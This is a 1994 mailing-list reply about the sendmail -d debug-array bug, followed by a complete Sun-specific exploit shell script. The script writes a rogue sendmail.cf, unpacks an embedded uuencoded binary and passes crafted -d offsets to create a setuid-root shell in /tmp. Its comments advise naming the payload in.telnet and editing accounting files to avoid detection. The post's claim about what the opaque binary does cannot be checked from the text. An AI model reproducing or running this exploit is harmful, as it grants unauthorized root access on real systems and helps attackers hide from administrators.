Re: Latest sendmail bug?
Michael R. Widner (widnerm@hsd.utc.com)
20 Jul 1994 10:17:04 -0400 (EDT)
In a previous message, Doug McLaren said:
> | > Does anyone have an exploit script we can use to test yet?
> | > The worst bug exploits sendmail -d and can be used to gain root
> | > according to CERT.
> |
> | an exploit script was posted to this list a few months back.
>
> Um, I checked and never found said script.
>
The last sendmail -d hole script was posted somewhere back around March I
believe. I've seen several different varieties, each of which has it's
strong points and weaknesses as an exploit script. The important thing to
know is that if your sendmail crashes when you pass it something like
-d387654321 then it can most likely be expoited to gain root access.
Without going into much detail, -dx.y writes y into the debug array as
array[x]=y. Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check. Find a key location
before the debug array, over write it, and you're in business.
The problem in trying to create a generic script is that the 'key' locations
have different offsets from the debug array for every version of sendmail.
Sometimes they're easy to locate if you can get a core, but sometimes it is
tough to get a core w/o already being root. Also, sometimes a core tells
you nothing.
The following script is Sun specific, and patches are now available for
all versions of Sun sendmail. The script creates a suid root owned copy
of /bin/sh and places it in /tmp. If you're hacking solaris, I'd suggest
you choose some program other than /bin/sh.
For the curious and paranoid, the uuencoded script is a compiled, compressed,
and uuencoded version of the following c prog, compiled under sunos.
main()
{ setuid(0); chown("/tmp/newsh", 0, 0); chmod("/tmp/newsh", 04755);
exit(0); }
I put it in this way because solaris lacks a bundled compiler.
Of course, I may be lying. It may really be a uuencoded program that does
main() { unlink("/");}, but you'll just have to trust me.
I should point out that Sun sendmail is in no way unique in it's vulnerability
to this hole.
It's also worth noting, for Solaris administrators and hackers, that the
normal Solaris patch procedure will leave the old (pre-patched) versions of
sendmail in their broken and SUID state under /var/sadm/patch. This should
be fixed, if you haven't done it already.
--
Michael R. Widner <widnerm@hsd.utc.com>
---------------------------
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array. As it, it will work with the 8 versions of sun sendmail
# that I have access to. Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE: This is a Sun specific script. Don't expect it to work with
# any non-sun sendmail.
# -Michael R. Widner (atreus) 3/25/94
#
# usage: smdhole [/path/to/suid/sendmail]
#
# add /usr/ucb to path so solaris can find `whoami` (4/18/94)
path=$path:/usr/ucb
if [ $1x = x ]; then
sendmail=/usr/lib/sendmail
else
echo "Trying to abuse $1."
sendmail=$1
fi
sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`
# prefix and suffix for -1 as unsigned integer. Actually, this is
# off by two. you figure out why.
prefix=42949
suffix=67297
case $sm_size in
132064)
n1=${prefix}52864
n2=${prefix}52865
n3=${prefix}52866
echo Patched solaris w/o mx.
;;
134752) # ug! dropped a 0 before. fixed 4/18/94
n1=${prefix}01656
n2=${prefix}01657
n3=${prefix}01658
echo Patched solaris sendmail.mx
;;
130860)
n1=${prefix}53016
n2=${prefix}53017
n3=${prefix}53018
echo Un-patched solaris w/o mx.
;;
133548) # ug! dropped a 0 before. fixed 4/18/94
n1=${prefix}01808
n2=${prefix}01809
n3=${prefix}01810
echo Un-patched solaris sendmail.mx
;;
139264)
n1=${prefix}49609
n2=${prefix}49610
n3=${prefix}49611
echo Sun 4.1.3 sendmail - could be either of two versions
n4=${prefix}49265
n5=${prefix}49266
n6=${prefix}49267
;;
155648)
n1=${prefix}46953
n2=${prefix}46954
n3=${prefix}46955
echo Sun 4.1.3 sendmail.mx - could be either of two versions
n4=${prefix}46609
n5=${prefix}46610
n6=${prefix}46611
;;
*)
echo "I don't know what version of sendmail $sendmail is."
echo -n "Look for other versions of sendmail[.mx] on the "
echo "system and re-run this as:"
echo " $0 /path/to/another/suid/sendmail"
echo
echo "Let me see if I can suggest anything..."
find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null
exit 1
;;
esac
cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp
H?F?From: nobody
Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog, P=/tmp/in.telnet, F=lsDFMeuP, S=10, R=20, A=sh -c \$u
S0
R\$+ \$#local \$:\$1 just rewrite
EOM
cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/in.telnet.Z
chmod 755 /tmp/in.telnet
mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail
cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh
$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF
test
EOF
if [ -x /tmp/newsh ]; then
echo "Had the right offset for sendmail.cf. Here's the result:"
else
echo "Looks like I had the wrong sendmail.cf offset. Fuckers."
if [ ${n4}x = x ]; then
echo "This version isn't what I thought it was."
echo "Look for other suid sendmails and try this on them."
else
echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF
test
EOF
echo "Here's the result:"
fi
fi
rm /tmp/in.telnet
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh
exit
# I'm calling this in.telnet for one reason. It shows up in the acct logs
# as being run by root. It will attract less attention if it's something
# normally run by root. An alert admin will catch is anyway, because
# in.telnet is normally not associated with a tty. The obvious fix, if you
# want to go undetected, would be to modify the acct files once you've
# become root.
begin 775 /tmp/in.telnet.Z
M'YV0@08$6 (B"!A$J5 CBX,*"O" <A#8 %!!)%8E44@%" "4!H A\!*+@atreus
M0D$(U$2 S:@( )A ,0@ 0)0 !@ 0"( 02$$%/ OZ1+"S9T%'G$: C%4atreus
MH%&B00%T&O<+S0N7KBJ(0Q'!)20)(ACX!+!$DD0 K" 0( 1%)>Q2RA)! %(atreus
M5$,).9]$%38!E!= H,(LP$LV*KJ*8(15)".N(AI2!6Q*(@ HPM6U6<4A@716atreus
M+H@"%QQ:D@!. ":U%L;2T'36E%H$D 0 H"!ML><#H0N.!B?A-(#4!5>PGGT9atreus
M068Z7==^%;%A[ BS!U6]5@P*#4V;. $L*)YY,P%@$LP"B' [-X#=O=56&'N!atreus
M]4'J<$(""V!.*1]U2@&Q4TJHY5J8,@FC%"+^00 3&, (" HC_B$@" 1@D*$@atreus
M))R!$, GQ!0$'1^!' ,. H&@<U).!CSX&00Y$6#B$2@"((") T0"S4$*I!A5atreus
M(,-\&%6% DA2 #@$4%, , "82(",!U7XAXD!(&G4"W7,(<<+;*0A!I5DN##'atreus
M&P"\0$89=KR@1QER</E0!F/(00<,.H#@QAL@0"DEE59BJ>4;"CP$@ EIKMFFatreus
MG%-6>24;66X)0AMAP %'&FZ< 8(98:3!1AURE)'G0A3TR::;<'H)IIADXKG0atreus
M"W2T <<+;I1QQQQH%#35+Y",%40(+OET@!X5 @ )!2) AT MN;AF:Z\Q@K atreus
M 7F8E4([MJZ1:X<?AOC0JY DAY( ((!3UR__$-: )!)D"XT 8%!FEXLY)3"Latreus
M)>02\*LD[8X+Q )U'20!M_U\!$H DDB24W8*6"M*N."$H@(8 D!#P'B?P&03atreus
M0J 0\@,_,N"K\'C0@BBB5%15>Y(TV')3%QCH I *.%R<S$ #1<4$@@$K%POatreus
M /?^LT]4R<$&%CBV(O%KQM)R#.L$)XT+!C,S$T9 A0'\\<\_YT CPM% ;_P0atreus
M$&P41( E3_^3(;!X%)0 UT_3(A0A!15 ]C^L"%43 VLO3$0G!2TP-K8"(7*atreus
M3VLS(Y39 #BP-A,(^0> 0BI51#1!36 $ 4(1>7X0Y$5)%M!!R"TL$L(50[ atreus
MI8<CE !"F1?D $((($20V @Q@!#HBFN'T .M(Y1<X'K2_M#M$B#4^T.,8ZHGatreus
M )$=P$A!)R!!>N8&A"-4WJ:/7H#?P%H]060%G&Z00P!DP-, 8NA9 D\&B*,Gatreus
M"Y$-X$=!(M1=D R9%R"'4$06M$/F!^0@E$)%? ^*GDO@R0% IQ I") %>LI"atreus
M9 A@BH*,@!0("0-/B**G-)"/#GJ20^9,(Q1H((00HSM ')Z'D$F,3@#3$ HXatreus
M$"**R!@@#P[$ D)JX<)$L&^%!4%&_/X'+&1\H0QT* ,>,/A#,H2!#F$ P _=atreus
M0 8 S &):G(B%.GP!3.PX0U'5.(/\9 &(B**44HL@QOLD(8RN4&+1,B"$X+0atreus
MA"0,(8Q<).(8T-"&-S3Q"W-\PQW.^(4^?I&/<P!B'=)PQS>X88M=U*(0N_@%atreus
M,M2A#6W(0R/+,(:L]?$+0Z#"$Z3P!28D80I4Z*,6OT $37+2DZ 4Y27)\(8Oatreus
MG.&*8@@#&_!(AS?(80ZC9*4K82G+1M;REHJ,8R,?&<DO5,H,PWM!&<I ACG8atreus
M84ID2,,<UC #*KUA#+*DTY7.,(8QM$!0+Y@#',(@!V_.H0YN:,$YWS0'&K@@atreus
M!BZHI@Q<4(-XZD"9S'0F-*5)36MBDPW:'-X!Z**0"6).<0<004XB]Y Q ( ,atreus
M61N>1"=*T8I:]*(8S:A&-\K1CGKTHR -J4A'2M*2FO2D*$VI2E?*TI:Z]*4Patreus
MC:E,9TK3FMKTICC-J4YWRM.>^O2G0 VJ4(=*U*(:]:A(3:I2E\K4ICKUJ5"-atreus
MJE2G2M6J6O6J6,VJ5K?*U:YZ]:M@#:M8QTK6LIKUK&A-JUK7RM:VNO6M<(VKatreus
M7.=*U[K:]:YXS>M2_0,$UP&+!"<MW>'V!BPN"(5D !B !W4"6)U0;R&5*P Ratreus
M$()#[@$ L3XQ7"" 0;*HO H43OL'/SQ+%= ^+1]!"<!G0VN/H A@M4^;1U &atreus
M -M_P",H!*AM.X)2@-JJ(RB(DR@0%JO7XAKWN,A-KG*7R]SF.O>YT(VN=*=+atreus
MW>I:][K8S:YVM\O=[GKWN^ -KWC'2][RFO>\Z$VO>M?+WO:Z][WPC:]\YTO?atreus
+^MKWOOC-KW[WFUS=atreus
atreus
endatreus